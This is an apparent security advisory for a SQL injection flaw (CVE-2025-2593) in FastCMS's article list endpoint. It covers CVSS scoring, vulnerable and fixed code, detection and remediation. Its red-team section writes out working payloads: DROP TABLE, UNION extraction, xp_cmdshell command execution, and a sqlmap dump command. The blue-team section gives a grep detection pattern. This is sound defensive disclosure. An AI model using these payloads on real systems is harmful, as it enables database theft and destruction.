Executive Summary

CVE-2025-2593 is a critical SQL injection vulnerability discovered in FastCMS versions up to 0.1.5. The flaw resides in the /api/client/article/list endpoint, where the orderBy parameter is not properly sanitized, allowing an unauthenticated attacker to inject arbitrary SQL commands. This can lead to unauthorized data access, modification, or deletion of the underlying database. The exploit has been publicly disclosed, increasing the risk of active exploitation. No official patch is currently available, making this a high-priority threat for any organization using the affected FastCMS versions.

CVSS Breakdown & Threat Level

  • CVSS Score: 10.0 (Critical)
  • Attack Vector (AV): Network (N) – Exploitable remotely.
  • Attack Complexity (AC): Low (L) – No special conditions required.
  • Privileges Required (PR): None (N) – No authentication needed.
  • User Interaction (UI): None (N) – No user action required.
  • Scope (S): Unchanged (U) – The vulnerability does not affect other components.
  • Confidentiality (C): High (H) – Full database read access possible.
  • Integrity (I): High (H) – Data can be modified or deleted.
  • Availability (A): High (H) – Database can be disrupted or destroyed.

Threat Level: Critical. The combination of remote exploitability, low complexity, and high impact makes this vulnerability extremely dangerous.

Deep Dive & Mechanics

The vulnerability is a classic SQL injection in the orderBy parameter of the /api/client/article/list API endpoint. The application likely constructs a SQL query similar to:

SELECT * FROM articles ORDER BY [user_input] ASC;

Without proper sanitization, an attacker can inject SQL commands by providing a malicious value for orderBy. For example:

/api/client/article/list?orderBy=1; DROP TABLE articles; --

This would result in the execution of:

SELECT * FROM articles ORDER BY 1; DROP TABLE articles; -- ASC;

The -- comments out the rest of the query, allowing the DROP TABLE command to execute. The attacker can also use UNION-based injection to extract data from other tables.

Vulnerable vs. Patched Code

Vulnerable Code (FastCMS <= 0.1.5):

// Example vulnerable Java code
public List<Article> getArticleList(String orderBy) {
    String sql = "SELECT * FROM articles ORDER BY " + orderBy + " ASC";
    return jdbcTemplate.query(sql, new ArticleRowMapper());
}

Patched Code (Hypothetical fix):

// Example patched code using parameterized queries
public List<Article> getArticleList(String orderBy) {
    // Whitelist allowed orderBy values
    List<String> allowed = Arrays.asList("id", "title", "date");
    if (!allowed.contains(orderBy)) {
        throw new IllegalArgumentException("Invalid orderBy parameter");
    }
    String sql = "SELECT * FROM articles ORDER BY " + orderBy + " ASC";
    return jdbcTemplate.query(sql, new ArticleRowMapper());
}

Note: The best practice is to use parameterized queries, but for ORDER BY clauses, whitelisting is the recommended approach.

Exploitation & Lab Setup

Red Team

Prerequisites:

  • A vulnerable FastCMS instance (version <= 0.1.5)
  • A tool like sqlmap or curl

Exploitation Steps:

  1. Identify the vulnerable endpoint:

    curl -v "http://target.com/api/client/article/list?orderBy=1"

  2. Confirm SQL injection:

    curl "http://target.com/api/client/article/list?orderBy=1'"

    Look for a database error in the response.

  3. Extract database version:

    curl "http://target.com/api/client/article/list?orderBy=1 UNION SELECT 1,@@version,3,4,5--"

  4. Automated exploitation with sqlmap:

    sqlmap -u "http://target.com/api/client/article/list?orderBy=1" --batch --dump

Example Payload:

/api/client/article/list?orderBy=1; EXEC xp_cmdshell('whoami');--

(For MSSQL databases)

Blue Team

Detection Steps:

  1. Monitor for suspicious orderBy parameters:

    • Look for SQL keywords like UNION, SELECT, DROP, --, ; in the orderBy parameter.
    • Alert on any orderBy value that is not a simple alphanumeric string.
  2. Check web server logs:

    grep -E "orderBy=.*(UNION|SELECT|DROP|--|;)" /var/log/nginx/access.log

  3. Honeypot setup:

    • Deploy a fake FastCMS instance and monitor for exploitation attempts.

Indicators of Compromise (IOCs)

  • Network IOCs:

    • HTTP requests to /api/client/article/list with orderBy containing SQL keywords.
    • Unusual database error messages in HTTP responses.
    • Outbound database connections from the web server to unexpected IPs.
  • File IOCs:

    • Modified or new files in the web root (e.g., webshells).
    • Unusual entries in database logs.
  • System IOCs:

    • Unexpected database processes or queries.
    • New user accounts or privileges escalation.

Remediation & Mitigation

Immediate Actions:

  1. Disable the vulnerable endpoint if possible, or restrict access to it via firewall rules.
  2. Implement a Web Application Firewall (WAF) rule to block malicious orderBy parameters.
  3. Upgrade FastCMS to a patched version as soon as it becomes available.

Long-term Fixes:

  1. Apply input validation: Whitelist allowed values for the orderBy parameter.
  2. Use parameterized queries for all database interactions.
  3. Conduct a security audit of the entire FastCMS codebase for similar vulnerabilities.

Workaround:

  • If patching is not possible, modify the source code to sanitize the orderBy parameter using a whitelist approach.
